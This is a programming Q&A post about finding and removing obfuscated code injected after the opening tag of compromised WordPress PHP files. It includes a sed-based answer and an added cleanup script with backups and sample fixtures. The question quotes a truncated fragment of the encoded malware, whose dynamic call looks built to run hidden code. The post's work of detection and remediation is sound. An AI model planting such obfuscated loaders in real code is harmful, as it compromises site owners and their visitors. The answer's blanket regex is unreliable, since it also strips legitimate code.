Dan Dan - 1 month ago 5
Bash Question

Identify compromised PHP files

I'm trying to cleanse some WordPress .php files that have been previously compromised, probably by MySQL code injection.

These files begin like this:

<?php$kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x2fvr# x5cq%7**^#zsfvr# x5!>> x22!pd%)!gj}Z;h!opjudovg}{;#)W%c!>!%i x5c2^<!Ce*[!ode(array_map("opfyigg",str_split("%tjw!>!#]y84]275]y83]248]y83]254ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2jm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x<*)ujojR x27id%6< x7fw6* x7f_*#ujoj;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs}


Some of them have a space after the opening tag, like:

<?php $kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)


I can search and replace all opening <?php tags, but that breaks some legitimate files.

Is there anything unique about this kind of PHP code so it can first be identified, then fixed? I'm not sure how to describe this code...

Answer

I have generally not seen a PHP file with any code after the php start tag. If that is the case and your problem statement is simplified to replacing

<?php.*$

with

<?php

you can use a sed command with find like this:

# GNU sed (-i edits in place); -print0/-0 keep paths with spaces intact
find . -type f -name '*.php' -print0 | xargs -0 sed -i 's/<?php.*$/<?php/'

You probably want to back up the files and do some research using grep before going ahead with the sed to replace in place.
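An added worked example, not part of the original question or answer, that turns the approach above into a script with a narrower match. Rather than rewriting every line that has anything after <?php, it flags only files whose opening tag is followed on the same line by a variable assigned a quoted string (the shape of both samples in the question, with or without the space), backs each flagged file up, and truncates only that first line. The regex, the function names and the sample tree it builds are assumptions for illustration; it needs GNU sed for -i.

```sh
#!/bin/sh
# Added example, not from the original answer: find WordPress .php files whose
# opening tag is followed on the same line by an injected "$var = '...'"
# payload, back them up, and strip the payload. Regex and names are assumptions.
set -u

# BRE for grep/sed. Matches "<?php$name = '" and "<?php $name = '" (the two
# shapes in the question) but not a bare "<?php" line or "<?php echo ...".
INJECT_RE='^<?php[[:space:]]*\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=[[:space:]]*'"'"

# is_infected FILE: succeed if the first line of FILE matches INJECT_RE.
is_infected() {
    head -n 1 "$1" | grep -q "$INJECT_RE"
}

# list_infected DIR: print the path of every infected .php file under DIR.
# (Paths containing newlines are not handled.)
list_infected() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if is_infected "$f"; then printf '%s\n' "$f"; fi
    done
}

# clean_file FILE: copy FILE to FILE.bak, then cut the first line back to a
# bare "<?php". Nothing past line 1 is touched. GNU sed; BSD sed wants -i ''.
clean_file() {
    cp -p -- "$1" "$1.bak" || return 1
    sed -i '1s/^<?php.*$/<?php/' "$1"
}

# clean_tree DIR: clean every infected file under DIR and print how many.
clean_tree() {
    n=0
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        clean_file "$f" && n=$((n + 1))
    done <<EOF
$(list_infected "$1")
EOF
    echo "$n"
}

# make_sample DIR: constructed fixture (not real files from the question):
# two infected files, a clean one, and a clean one with code on the <?php
# line that a blanket "<?php.*$" rewrite would have destroyed.
make_sample() {
    mkdir -p "$1/wp-includes"
    printf '%s\n' "<?php\$kjzbobc = '<#65,47R25,d7R17#/q%>'; \$natxway();" \
        '// original WordPress code continues' > "$1/wp-load.php"
    printf '%s\n' "<?php \$kjzbobc = '<#16,47R57,27R66#/q%>'; \$natxway();" \
        '// original WordPress code continues' > "$1/wp-includes/load.php"
    printf '%s\n' '<?php' 'echo "clean";' > "$1/clean.php"
    printf '%s\n' "<?php echo 'hi'; ?>" > "$1/inline.php"
}

# Usage: sh clean_wp.sh DIR          list infected files
#        sh clean_wp.sh DIR --fix    back up and clean them, print the count
if [ $# -ge 1 ]; then
    if [ "${2-}" = "--fix" ]; then clean_tree "$1"; else list_infected "$1"; fi
fi
```

Run it once without --fix and read the list before cleaning; anything legitimate that matches (a file that really does start with `<?php $x = '...'`) should be excluded before the second pass, since only the first line is inspected and the check does not parse PHP.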